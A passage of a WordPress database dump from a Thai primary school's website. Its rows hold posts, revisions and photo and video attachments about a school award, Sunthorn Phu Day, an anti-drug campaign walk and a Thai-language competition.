(1774,1,'2025-07-08 14:23:45','2025-07-08 07:23:45','<!-- wp:paragraph -->\n<p>เมื่อวันที่ 7 กรกฎาคม พ.ศ.2568 นางเสน่หา พลโสภา เข้าร่วมประชุมผู้บริหารสถานศึกษา เพื่อรับฟังข้อราชการ ณ สำนักงานเขตพื้นที่การศึกษาประถมศึกษาศรีสะเกษ เขต 1 และในการนี้ ได้รับมอบเกียรติบัตรจากสำนักงานเขตพื้นที่การศึกษา โดยนายสุเทพ ศรบุญทอง ผู้อำนวยการสำนักงานเขตพื้นที่การศึกษาประถมศึกษาศรีสะเกษ เขต 1 เป็นผู้มอบให้แก่ โรงเรียนบ้านหนองปลาเข็ง-กอไหล่ ว่าเป็นสถานศึกษาที่มีระบบและกลไกทางการบริหารจัดการคุณภาพและมาตรฐานการศึกษาเพื่อการประเมินคุณภาพการศึกษา ได้รับรางวัล IQA AWARD ระดับชมเชย</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":1769,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/320170_0-1024x881.jpg\" alt=\"\" class=\"wp-image-1769\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1773,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/320171_0-1024x770.jpg\" alt=\"\" class=\"wp-image-1773\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1772,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/320172_0-984x1024.jpg\" alt=\"\" class=\"wp-image-1772\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1770,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/320173_0-960x1024.jpg\" alt=\"\" class=\"wp-image-1770\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1771,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/320174_0-947x1024.jpg\" alt=\"\" class=\"wp-image-1771\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->','การประชุมผู้บริหารสถานศึกษาและรับมอบเกียรติบัตร IQA award','','inherit','closed','closed','','1768-revision-v1','','','2025-07-08 14:23:45','2025-07-08 07:23:45','',1768,'http://pakhaeng.ssk.in.th/?p=1774',0,'revision','',0),
(1776,1,'2025-07-09 09:48:30','2025-07-09 02:48:30','<!-- wp:image {\"id\":1777,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/12-68-724x1024.png\" alt=\"\" class=\"wp-image-1777\"/></figure>\n<!-- /wp:image -->','วารสาร12/2568','','publish','closed','closed','','%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a312-2568','','','2025-07-09 09:50:25','2025-07-09 02:50:25','',0,'http://pakhaeng.ssk.in.th/?p=1776',0,'post','',0),
(1777,1,'2025-07-09 09:48:13','2025-07-09 02:48:13','','12-68','','inherit','','closed','','12-68','','','2025-07-09 09:48:13','2025-07-09 02:48:13','',1776,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/12-68.png',0,'attachment','image/png',0),
(1778,1,'2025-07-09 09:48:30','2025-07-09 02:48:30','<!-- wp:image {\"id\":1777,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/12-68-724x1024.png\" alt=\"\" class=\"wp-image-1777\"/></figure>\n<!-- /wp:image -->','วารสาร12/2568','','inherit','closed','closed','','1776-revision-v1','','','2025-07-09 09:48:30','2025-07-09 02:48:30','',1776,'http://pakhaeng.ssk.in.th/?p=1778',0,'revision','',0),
(1782,1,'2025-07-09 10:01:38','2025-07-09 03:01:38','','LINE_ALBUM_วันสุนทรภู่_250626_17','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%b8%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b8%a0%e0%b8%b9%e0%b9%88_250626_17-3','','','2025-07-09 10:01:38','2025-07-09 03:01:38','',0,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/LINE_ALBUM_วันสุนทรภู่_250626_17.jpg',0,'attachment','image/jpeg',0),
(1783,1,'2025-07-09 10:01:38','2025-07-09 03:01:38','','LINE_ALBUM_วันสุนทรภู่_250626_13','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%b8%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b8%a0%e0%b8%b9%e0%b9%88_250626_13-3','','','2025-07-09 10:01:38','2025-07-09 03:01:38','',0,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/LINE_ALBUM_วันสุนทรภู่_250626_13.jpg',0,'attachment','image/jpeg',0),
(1784,1,'2025-07-09 10:01:38','2025-07-09 03:01:38','','LINE_ALBUM_วันสุนทรภู่_250626_16','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%b8%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b8%a0%e0%b8%b9%e0%b9%88_250626_16-3','','','2025-07-09 10:01:38','2025-07-09 03:01:38','',0,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/LINE_ALBUM_วันสุนทรภู่_250626_16.jpg',0,'attachment','image/jpeg',0),
(1785,1,'2025-07-09 10:01:38','2025-07-09 03:01:38','','LINE_ALBUM_วันสุนทรภู่_250626_12','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%b8%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b8%a0%e0%b8%b9%e0%b9%88_250626_12-4','','','2025-07-09 10:01:38','2025-07-09 03:01:38','',0,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/LINE_ALBUM_วันสุนทรภู่_250626_12.jpg',0,'attachment','image/jpeg',0),
(1786,1,'2025-07-09 10:01:38','2025-07-09 03:01:38','','LINE_ALBUM_วันสุนทรภู่_250626_15','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%b8%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b8%a0%e0%b8%b9%e0%b9%88_250626_15-3','','','2025-07-09 10:01:38','2025-07-09 03:01:38','',0,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/LINE_ALBUM_วันสุนทรภู่_250626_15.jpg',0,'attachment','image/jpeg',0),
(1787,1,'2025-07-09 10:01:38','2025-07-09 03:01:38','','LINE_ALBUM_วันสุนทรภู่_250626_14','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%b8%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b8%a0%e0%b8%b9%e0%b9%88_250626_14-3','','','2025-07-09 10:01:38','2025-07-09 03:01:38','',0,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/LINE_ALBUM_วันสุนทรภู่_250626_14.jpg',0,'attachment','image/jpeg',0),
(1788,1,'2025-07-09 10:01:41','2025-07-09 03:01:41','','LINE_ALBUM_วันสุนทรภู่_250626_9','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%b8%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b8%a0%e0%b8%b9%e0%b9%88_250626_9-3','','','2025-07-09 10:01:41','2025-07-09 03:01:41','',0,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/LINE_ALBUM_วันสุนทรภู่_250626_9.jpg',0,'attachment','image/jpeg',0),
(1789,1,'2025-07-09 10:01:41','2025-07-09 03:01:41','','LINE_ALBUM_วันสุนทรภู่_250626_10','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%b8%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b8%a0%e0%b8%b9%e0%b9%88_250626_10-3','','','2025-07-09 10:01:41','2025-07-09 03:01:41','',0,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/LINE_ALBUM_วันสุนทรภู่_250626_10.jpg',0,'attachment','image/jpeg',0),
(1790,1,'2025-07-09 10:01:42','2025-07-09 03:01:42','','LINE_ALBUM_วันสุนทรภู่_250626_6','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%b8%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b8%a0%e0%b8%b9%e0%b9%88_250626_6-3','','','2025-07-09 10:01:42','2025-07-09 03:01:42','',0,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/LINE_ALBUM_วันสุนทรภู่_250626_6.jpg',0,'attachment','image/jpeg',0),
(1791,1,'2025-07-09 10:01:42','2025-07-09 03:01:42','','LINE_ALBUM_วันสุนทรภู่_250626_8','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%b8%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b8%a0%e0%b8%b9%e0%b9%88_250626_8-4','','','2025-07-09 10:01:42','2025-07-09 03:01:42','',0,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/LINE_ALBUM_วันสุนทรภู่_250626_8.jpg',0,'attachment','image/jpeg',0),
(1792,1,'2025-07-09 10:01:42','2025-07-09 03:01:42','','LINE_ALBUM_วันสุนทรภู่_250626_7','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%b8%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b8%a0%e0%b8%b9%e0%b9%88_250626_7-3','','','2025-07-09 10:01:42','2025-07-09 03:01:42','',0,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/LINE_ALBUM_วันสุนทรภู่_250626_7.jpg',0,'attachment','image/jpeg',0),
(1793,1,'2025-07-09 10:01:42','2025-07-09 03:01:42','','LINE_ALBUM_วันสุนทรภู่_250626_11','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%b8%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b8%a0%e0%b8%b9%e0%b9%88_250626_11-3','','','2025-07-09 10:01:42','2025-07-09 03:01:42','',0,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/LINE_ALBUM_วันสุนทรภู่_250626_11.jpg',0,'attachment','image/jpeg',0),
(1794,1,'2025-07-09 10:01:45','2025-07-09 03:01:45','','LINE_ALBUM_วันสุนทรภู่_250626_5','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%b8%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b8%a0%e0%b8%b9%e0%b9%88_250626_5-3','','','2025-07-09 10:01:45','2025-07-09 03:01:45','',0,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/LINE_ALBUM_วันสุนทรภู่_250626_5.jpg',0,'attachment','image/jpeg',0),
(1795,1,'2025-07-09 10:01:45','2025-07-09 03:01:45','','LINE_ALBUM_วันสุนทรภู่_250626_4','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%b8%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b8%a0%e0%b8%b9%e0%b9%88_250626_4-3','','','2025-07-09 10:01:45','2025-07-09 03:01:45','',0,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/LINE_ALBUM_วันสุนทรภู่_250626_4.jpg',0,'attachment','image/jpeg',0),
(1796,1,'2025-07-09 10:01:46','2025-07-09 03:01:46','','LINE_ALBUM_วันสุนทรภู่_250626_3','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%b8%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b8%a0%e0%b8%b9%e0%b9%88_250626_3-3','','','2025-07-09 10:01:46','2025-07-09 03:01:46','',0,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/LINE_ALBUM_วันสุนทรภู่_250626_3.jpg',0,'attachment','image/jpeg',0),
(1797,1,'2025-07-09 10:01:46','2025-07-09 03:01:46','','LINE_ALBUM_วันสุนทรภู่_250626_1','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%b8%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b8%a0%e0%b8%b9%e0%b9%88_250626_1-3','','','2025-07-09 10:01:46','2025-07-09 03:01:46','',0,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/LINE_ALBUM_วันสุนทรภู่_250626_1.jpg',0,'attachment','image/jpeg',0),
(1798,1,'2025-07-09 10:01:46','2025-07-09 03:01:46','','LINE_ALBUM_วันสุนทรภู่_250626_2','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%b8%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b8%a0%e0%b8%b9%e0%b9%88_250626_2-3','','','2025-07-09 10:01:46','2025-07-09 03:01:46','',0,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/LINE_ALBUM_วันสุนทรภู่_250626_2.jpg',0,'attachment','image/jpeg',0),
(1800,1,'2025-07-09 10:03:53','2025-07-09 03:03:53','<!-- wp:video {\"id\":1801} -->\n<figure class=\"wp-block-video\"><video controls src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/เดินรณรงค์ต่อต้านยาเสพติด-รร.หนองปลาเข็ง-กอไหล่.mp4\"></video></figure>\n<!-- /wp:video -->','กิจกรรมเดินรณรงต่อต้านยาเสพติด','','publish','closed','closed','','%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%80%e0%b8%94%e0%b8%b4%e0%b8%99%e0%b8%a3%e0%b8%93%e0%b8%a3%e0%b8%87%e0%b8%95%e0%b9%88%e0%b8%ad%e0%b8%95%e0%b9%89%e0%b8%b2%e0%b8%99','','','2025-07-09 10:03:55','2025-07-09 03:03:55','',0,'http://pakhaeng.ssk.in.th/?p=1800',0,'post','',0),
(1801,1,'2025-07-09 10:03:21','2025-07-09 03:03:21','','เดินรณรงค์ต่อต้านยาเสพติด รร.หนองปลาเข็ง กอไหล่','','inherit','','closed','','%e0%b9%80%e0%b8%94%e0%b8%b4%e0%b8%99%e0%b8%a3%e0%b8%93%e0%b8%a3%e0%b8%87%e0%b8%84%e0%b9%8c%e0%b8%95%e0%b9%88%e0%b8%ad%e0%b8%95%e0%b9%89%e0%b8%b2%e0%b8%99%e0%b8%a2%e0%b8%b2%e0%b9%80%e0%b8%aa%e0%b8%9e','','','2025-07-09 10:03:21','2025-07-09 03:03:21','',1800,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/เดินรณรงค์ต่อต้านยาเสพติด-รร.หนองปลาเข็ง-กอไหล่.mp4',0,'attachment','video/mp4',0),
(1802,1,'2025-07-09 10:03:32','2025-07-09 03:03:32','','Screenshot 2025-07-09 095350','','inherit','','closed','','screenshot-2025-07-09-095350','','','2025-07-09 10:03:32','2025-07-09 03:03:32','',1800,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/Screenshot-2025-07-09-095350.png',0,'attachment','image/png',0),
(1803,1,'2025-07-09 10:03:53','2025-07-09 03:03:53','<!-- wp:video {\"id\":1801} -->\n<figure class=\"wp-block-video\"><video controls src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/เดินรณรงค์ต่อต้านยาเสพติด-รร.หนองปลาเข็ง-กอไหล่.mp4\"></video></figure>\n<!-- /wp:video -->','กิจกรรมเดินรณรงต่อต้านยาเสพติด','','inherit','closed','closed','','1800-revision-v1','','','2025-07-09 10:03:53','2025-07-09 03:03:53','',1800,'http://pakhaeng.ssk.in.th/?p=1803',0,'revision','',0),
(1804,1,'2025-07-09 10:17:55','2025-07-09 03:17:55','<!-- wp:paragraph -->\n<p>วันที่ 8 กรกฎาคม พ.ศ.2568 โรงเรียนบ้านหนองปลาเข็ง-กอไหล่ เข้าร่วมการแข่งขันโครงการรักษ์ภาษาไทย เนื่องในสัปดาห์วันภาษาไทยแห่งชาติ ประจำปี 2568 ของกลุ่ม CEO ประจิมโนนคูณ การแข่งขันในครั้งนี้ จัด ณ โรงเรียนบ้านหนองปลาเข็ง กอไหล่ มีกิจกรรมการแข่งขันทั้งหมด 4 รายการ ได้แก่ คัดลายมือ , การเขียนเรื่องจากภาพ , การเขียนเรียงความ , การแต่งคำประพันธ์</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":1806,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/LINE_ALBUM_ศิลปหัตถกรรม_250709_5-1024x768.jpg\" alt=\"\" class=\"wp-image-1806\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1809,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/LINE_ALBUM_ศิลปหัตถกรรม_250709_4-1024x768.jpg\" alt=\"\" class=\"wp-image-1809\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1805,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/LINE_ALBUM_ศิลปหัตถกรรม_250709_3-1024x768.jpg\" alt=\"\" class=\"wp-image-1805\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1810,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/LINE_ALBUM_ศิลปหัตถกรรม_250709_2-1024x768.jpg\" alt=\"\" class=\"wp-image-1810\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1807,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/LINE_ALBUM_ศิลปหัตถกรรม_250709_1-1024x768.jpg\" alt=\"\" class=\"wp-image-1807\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1808,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871454_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1808\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1816,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871455_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1816\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1812,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871445_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1812\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1811,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871447_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1811\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1813,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871448_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1813\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1814,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871449_0-768x1024.jpg\" alt=\"\" class=\"wp-image-1814\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1815,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871450_0-768x1024.jpg\" alt=\"\" class=\"wp-image-1815\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1819,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871451_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1819\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1817,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871452_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1817\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1820,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871453_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1820\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1818,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871394_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1818\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1822,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871391_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1822\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1821,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871393_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1821\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1823,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871396_0-768x1024.jpg\" alt=\"\" class=\"wp-image-1823\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1824,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871397_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1824\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1827,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871395_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1827\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1825,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871398_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1825\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1826,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871400_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1826\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1828,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871401_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1828\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1829,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871399_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1829\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1830,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871420_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1830\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1831,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871374_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1831\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1833,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871376_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1833\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1832,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871387_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1832\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1834,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871389_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1834\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1835,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871390_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1835\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1836,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871409_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1836\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1838,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871410_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1838\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1837,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871411_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1837\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1839,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871412_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1839\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1841,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871413_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1841\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image 